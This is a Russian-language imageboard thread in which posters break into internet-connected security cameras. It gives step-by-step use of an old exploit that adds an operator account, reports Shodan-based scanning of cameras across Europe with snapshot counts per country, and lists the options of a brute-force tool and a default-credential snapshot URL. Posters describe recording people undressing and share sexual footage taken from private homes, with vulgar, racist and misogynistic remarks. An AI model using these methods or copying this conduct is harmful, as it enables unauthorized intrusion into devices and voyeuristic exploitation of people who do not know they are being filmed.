Своим сообщением ты вызываешь дополнительный интерес.
мне похуй
модер пидр удаляет сообщения
И что это теперь подстановкой в блокнотике ip адресса в двуъ местах сможно камеры ломать?
Создаешь php или html файл пихаешь все туда, не забыв поменять IP , запускаешь скрипт. Проще всего скачать OpenServer и скинуть скрипт в папку domain/localhost.Запускаешь сервак . В браузере пишешь localhost/имяскрипта.php(html), если все сделано верное лицезрееш кнопку submit жмакаеш на нее и добавляется оператор. Сказу скажу что мало камер будут поддаватьcя этy уязвимость потому что она древняя (2013 год). Сплоит рабочий проверил у себя на работе на старой камере у которой прошивка не обнавлялась
Зря так подробно:3 этот сплоит работает на тех камерах где kika может скрин вытянуть? Или этот ещё древнее?
так там серьёзно только в двух местах rhost воткнуть?
напиши уж тогда, чтобы она автоматом подставлял айпишники из текстового файлика и перебирала их, а то заёбищно переписывать его под каждый айпишник?
Палите уже как добавить юзера с правами, пока хакеры не набежали
Просканил всю Европу (то есть то что выдал шодан) И вот такая статистика кому интересно.
В правой колонке число камер с которых смог сохронить скрин
MariaDB [sh]> select country_code, count(*) as c from sh inner join country_continent using (country_code) where httpErrorNo = 0 and continent_code = 'EU' group by country_code order by c desc;
+--------------+------+
| country_code | c |
+--------------+------+
| RU | 8240 |
| UA | 4115 |
| NL | 1958 |
| GB | 1869 |
| FR | 1598 |
| PL | 1520 |
| RO | 1474 |
| IT | 1465 |
| BG | 1357 |
| CZ | 1230 |
| ES | 804 |
| PT | 762 |
| TR | 746 |
| DE | 715 |
| LT | 601 |
| HU | 525 |
| BE | 475 |
| SK | 467 |
| DK | 443 |
| LV | 362 |
| SE | 332 |
| EE | 297 |
| MD | 293 |
| CH | 241 |
| AT | 217 |
| RS | 202 |
| IE | 180 |
| FI | 173 |
| BY | 153 |
| GR | 134 |
| NO | 133 |
| SI | 75 |
| AL | 59 |
| MK | 53 |
| IS | 38 |
| HR | 35 |
| MT | 33 |
| BA | 33 |
| LU | 20 |
| AD | 3 |
| GI | 3 |
| ME | 2 |
| FX | 2 |
| GG | 1 |
| MC | 1 |
+--------------+------+
В правой колонке число камер с которых смог сохронить скрин
MariaDB [sh]> select country_code, count(*) as c from sh inner join country_continent using (country_code) where httpErrorNo = 0 and continent_code = 'EU' group by country_code order by c desc;
+--------------+------+
| country_code | c |
+--------------+------+
| RU | 8240 |
| UA | 4115 |
| NL | 1958 |
| GB | 1869 |
| FR | 1598 |
| PL | 1520 |
| RO | 1474 |
| IT | 1465 |
| BG | 1357 |
| CZ | 1230 |
| ES | 804 |
| PT | 762 |
| TR | 746 |
| DE | 715 |
| LT | 601 |
| HU | 525 |
| BE | 475 |
| SK | 467 |
| DK | 443 |
| LV | 362 |
| SE | 332 |
| EE | 297 |
| MD | 293 |
| CH | 241 |
| AT | 217 |
| RS | 202 |
| IE | 180 |
| FI | 173 |
| BY | 153 |
| GR | 134 |
| NO | 133 |
| SI | 75 |
| AL | 59 |
| MK | 53 |
| IS | 38 |
| HR | 35 |
| MT | 33 |
| BA | 33 |
| LU | 20 |
| AD | 3 |
| GI | 3 |
| ME | 2 |
| FX | 2 |
| GG | 1 |
| MC | 1 |
+--------------+------+
Ты какой запрос делал?
webs -goahead
Но это для всех хиквижн которые я раньше брутил по дефолтными паролями. Для этой новой уезвимости походу только app-webs имеет смысл искать
Это что за камера? хиквижн или что-то другое?
А потом у них был анал и жили они долго и счастливо
ubnt помойму
Не удивлюсь если она его отстрапонила.))
как отсканил? какая уезвимост? подробнее
1. Меняем порт на камере на нестандартный.
2. Меняем дефолтные логин\пароль.
3. Оставляем в роутере доступ только с необходимых ip, остальные блочим.
4. Меняем на роутере дефолтные логин\пароль.
Хикка отсасывает!
Мне вот инетересно. Поменял какой-то хуй все дефолтные пароли на камерах. А что владельцы? Забили на них? У них же тоже все доступы должны пойти по пизде? Первое что приходит на ум, это сбросить все к заводским настройкам, после чего эти камеры снова засветились бы. А этого почему-то не происходит. Почему, а?
Это все очень странно.
Если сборсить настройки а камера подключена через вайфай, то всё, потерял её. Нужно подключиться по местной сети и переустроить
Ебать, иди проспись.
чую что-то интересное
Вот это камера была, пока какой-то евнух не сменил пароль
Благо, я успел наделать записей, как все работницы переодеваются
Благо, я успел наделать записей, как все работницы переодеваются
Нихуя там не было интересного. Это какое-то кафе в подмосковье(я даже на гугл-улицах это место находил, но потом забыл).
Дальше лифчиков они не раздевались там.
Но если пароль сменили, то всё равно жаль.
почему они раздевались только до лифчиков? они после работы не моются что ли?
Это вообще Казахстан блять, там не только раздевались, но и молились регулярно
Видимо, не моются. Просто скидывали официантскую спецодежду и одевали гражданскую. Чучмеки, хуле.
Не замечал, чтобы молились, а вот что переодевались все вперемешку - и бабы и мужики - это да. И никто друг друга не стеснялся. Но сиськи не показывали. ни наедине ни перед мужиками. Но ебать они страшные. Откуда берутся все эти эротические фантазии про азиаток, если даже официантки у них страшны как атомная война?
а что в них страшного кроме ебала?
>молились
а какая у них религия?
Зачем вообще ставить камеру в раздевалку? Или это какой-нибудь охранник дрочер запрятал камеру где-нибудь в стене и её никто не замечает?
А вот я, может, и пизжу.
Посмотрел те записи, которые делал и вроде помещение-то похоже, да не совсем. Гладилка там у них тоже есть
Посмотрел те записи, которые делал и вроде помещение-то похоже, да не совсем. Гладилка там у них тоже есть
Как вы дымаете, зачем установлена это камера?
зачем?
Да все фапабельны были, кроме разве что жирухи в труханах-парашютах
Хотя, уверен, что кто-то из местных и на нее сладко передергивал
Не, это другое что-то
Запили видео из той раздевалки
Есть регистратор, к нему не подключен диск для записи, можно ли как-то самому подключить диск для запис
https://t.me/joinchat/AAAAAEREfMIQ1-hQLt0f9A ссыль на конфу
https://t.me/joinchat/AAAAAEREfMIQ1-hQLt0f9A конфа...
И распрастроните среди жельцов, как вы это любите....
И распрастроните среди жельцов, как вы это любите....
как подключится через веб клиент?
А что за китайская порога за 28 баксов с камерами?
Что за конфач? Писать нельзя
Что за прога?
Аноны, скиньте пожалуйста, если кто ловил, шликающих тянок. Хотя бы скрины.
Ебать СУКА, вы че охуели??!! Это мои соседи!! ЕБАТЬ! Дайте IP срочно!
172.0.0.1
у первой камеры айпи подтер?
Да
охуенно, конечно, я бы обменялся с тобой, но у тебя скорее всего не будет желания, так?
нахуя ты это тут выложил? Ты ж не думаешь, что это гинекологические кресла, а?
Хороша была камера, всё там было)) Только вот я не понял, мужик белый вроде как я понял с женой своей в одной комнате был, а эта негритянка вроде как дочка его, мне так изначально казалось, судя по поведению и тд. Но херли он потом и её трахать начал? Значит не дочка?
Мужик белый, а дочка негритянка.
Нормально же.
Дочка.
та какая нахуй дочка. Там два разных мужика её потрахивали. Потом еще одна негритоска появилась и уже её чаще приходовали. Сложилось мнение, что негритоска просто жила там с оплатой сексом, студентка, мож. Иногда мужики пропадали надолго, более недели. Она тогда селфилась голая на телефон часто.
прикол. Это что такое вообще? Это посуточная хата или этот чел там постоянно? Бабы есть там?
В "Сам себе режиссер" отправит.
>>10563
это дочка негритянки из другой комнаты. он ее трахать не так давно начал, до этого все взрослую ебал. один раз даже тройничок устроили. ооочень странная фигня ) камера мертва?
это дочка негритянки из другой комнаты. он ее трахать не так давно начал, до этого все взрослую ебал. один раз даже тройничок устроили. ооочень странная фигня ) камера мертва?
Давно уже.
Там просто анализы крови берут
Внимательно прочитайте что на плакате на стене написанно :)
LOL
Уже понятно китайцы на своих камерах бакдоры поставили. А потом программы продают по 28 евро..
Есть бабы голые в бассейнах?
Четвертая камера адовая, такого я ни на одном порносайте не видел.
Анастасия
Реально продают и не только китайцы. цена одинаковая. Софт хз какой, но там фишка, что они обновления дают и сами палят камеры и дают адреса с явками\паролями. Достаточно старая тема, возможно уже прикрыли.
Шторы понравились?
Видимо не всё сломали, наблюдал эту камеру год назад.
в той комнате, где она закрывает камеру чем-то - там есть что-то стоящее?
Я коридор вспомнил больше, видимо закрывала остальное раз не сохранил себе в историю.
бдительный французский товарищ.
Я бы обосрался
Насканил я, значит, 30000 хостов в ДС. Запустил хикку, а она мне открыла 70 картинок. Что за хуйня, товарищи?
Тред достиг бамплимита, поэтому создал новый
лей список.
Какой пароль там был?
>Причесал скриптик - и надо признать довольно лампово получилось.в
>https://github.com/makaka-hacker/kikka
>Скрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46
>
>
>Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.
>
>Но:
>1) часть снимков выходит битая - не только jpg качается
>2) я хз как в баше потоки организовать - поэтому всего один
>3) не windows :0
>4) Все равно надо добручивать - искать пасс от годной камеры
>5) bash не айс для таких дел
>
>Добра анону, который в /b тред создал
В targets.txt нужно вставить блоки IP. В logins и passwords должны быть ваши логины и пароли. В папку good будут сохранятся изображения с камер. После перебора можно подключиться к видеорегистратору при помощи программы IVMS-4200 http://overseas.hikvision.com/europe/Tools_84.html .
Полный список команд hikka:
-bf-threads int Bruteforcer threads count (default 1)
-check Check cameras (experimental and not fully tested, but very useful)
-csv string Write result to CSV
-json string Write result to JSON
-logins string A file with a list of logins to bruteforce (default "logins")
-m3u string Write result to m3u playlist
-passwords string A file with a list of passwords to bruteforce (default "passwords")
-port int Camera service port (default 8000)
-shoots string Download pics from cameras into a folder
-threads int Threads count (default 1)
Предыдущий тред: